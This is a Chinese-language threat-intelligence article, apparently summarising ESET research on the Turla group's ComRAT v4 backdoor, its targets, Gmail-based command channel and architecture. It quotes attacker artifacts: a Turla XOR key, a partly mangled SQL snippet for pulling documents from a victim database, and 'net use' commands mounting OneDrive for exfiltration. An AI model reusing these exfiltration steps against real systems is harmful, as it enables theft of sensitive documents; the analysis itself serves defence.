一个古老恶意软件家族的十年发展史

ESET研究人员发现了Turla组织更新了其一款非常古老的恶意软件家族——ComRAT。ComRAT也叫Agent.BTZ，是一款远程访问木马，自2008年用于美国军方数据泄露后开始闻名。ComRAT的第一个版本发布于2007年，就具有蠕虫般的功能，通过可移除设备来进行传播。2007年到2012年，ComRAT又发布了2个大的更新版本，这2个版本都使用了知名的Turla XOR key:

1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s

2017年中，Turla开发者对ComRAT做了一些修改，但这些变种都是来源于系统的代码基。然后，2017年还发布了一个不同的ComRAT版本，该新版本使用了完全不同的代码基，并且与之前的版本要复杂一些。该恶意软件家族的特征包括：

· ComRAT v4最早发布于2017年，直到2020年1月才被发现。

· 研究人员发现该恶意软件家族的目标主要有：2个外交部和1个国会。

· ComRAT被用来窃取敏感的文档。运营者使用公有云服务来窃取数据，比如OneDrive和4shared。

· ComRAT是用C++语言开发的复杂后门。

· ComRAT 使用Virtual FAT16文件系统。

· ComRAT用现有的访问方法来进行部署，比如PowerStallion PowerShell后门。

· ComRAT有2个命令和控制信道：

   · HTTP: 使用于ComRAT v3相同的协议

   · Email: 使用Gmail web接口来接收命令和窃取数据

· ComRAT 可以在受害者计算机上执行许多的操作，比如执行其他程序和窃取文件。

与Turla有关

研究人员根据受害者分布和TTP分析，认为ComRAT后门与Turla黑客组织有关。有很多比较明显的线索将ComRAT v4和Turla关联在一起了：

· 使用与之前版本相同的内部名Chinch。

· 使用与ComRAT v3相同的基于HTTP的定制的C2协议。

· 部分网络基础设施与其他的Turla恶意软件家族相同。

· 被其他Turla恶意软件家族释放过或释放过其他恶意软件家族应用：

   · 定制的PowerShell加载器

   · PowerStallion后门

   · RPC后门

攻击者活动分析

ComRAT的主要作用是窃取机密文档。在其中一个例子中，其运营者甚至部署了一个.NET 可执行文件来与受害者的中央MS SQL服务器数据库进行通信，以窃取组织内部文档。使用的SQL命令如下：

sqlCommand.CommandText = "select top " + num2.ToString() + " filename, img, datalength(img), id from  with(nolock) where not img is null and id>" + num4.ToString();
sqlCommand.CommandText += " and datalength(img)9))";
sqlCommand.CommandText += " order by id";

图 1. 从中心数据库窃取文档的SQL命令

然后这些窃取的文档会被压缩和发送到云存储服务提供商处，比如OneDrive和4shared。使用下面的命令来挂载云存储：

tracert -h 10 yahoo.com
net use  https://docs.live.net/E65  /u:@aol.co.uk
tracert -h 10 yahoo.com

图 2. 用来挂载OneDrive文件夹的命令

除了窃取文件外，运营者还会运行其他的命令来收集Active Directory组或用户、网络、Windows配置的信息。图3是Turla运营者执行的一些命令：

此外，Turla运营者还会尝试绕过安全软件。比如，定期窃取安全相关的日志来分析恶意软件样本是否会被检测到。这表明该组织的攻击等级的复杂性以及计划长期对设备进行监听。

技术分析

根据编译的时间戳分析，第一个ComRAT v4样本出现于2017年4月。而最近的后门版本编译于2019年11月。

ESET研究人员认为ComRAT是用一些现用的基础来安装的，比如被窃的凭证或其他Turla后门。比如，研究人员就发现过通过PowerStallion安装的ComRAT样本。

ComRAT安装器是一个PowerShell脚本，会创建一个Windows计划任务和在注册表中填充加密的payload。

ComRAT v4有如下组件：

· 用来注入到explorer.exe的orchestrator（协调器），奇热负责控制包括后门命令执行在内的大多数ComRAT函数。

· 由orchestrator注入到默认浏览器中的通信模块——DLL文件，负责使用命名管道与orchestrator通信。

· 一个含有配置和日志文件的虚拟FAT16 文件系统。

图 4是ComRAT架构的示意图：

图 4. ComRAT架构总结

ComRAT v4有2个不同的C2信道：

· HTTP:使用HTTP协议（与之前版本相同）；

· Email：使用Gmail web接口。

在email模式中，使用配置中保持的cookies，连接到Gmail web接口来检查收件箱和下载含有加密命令的特定邮件附件。这些命令是恶意软件从其他地址发送的，一般保持在不同的免费邮箱服务器处，比如GMX。

结论

ComRAT v4最早出现于2017年，其最有趣的特征就是使用Gmail web UI来接收命令和窃取数据。因此可以绕过一些安全控制，因为该后门并不依赖于任何恶意域名。此外，该版本恶意软件还放弃了使用COM对象劫持来实现驻留。研究人员分析发现ComRAT v4与Turla黑客组织有关。这也表明Turla黑客组织仍然活跃，而且是外交和军事机构的重大威胁。

更多技术细节参见白皮书：https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf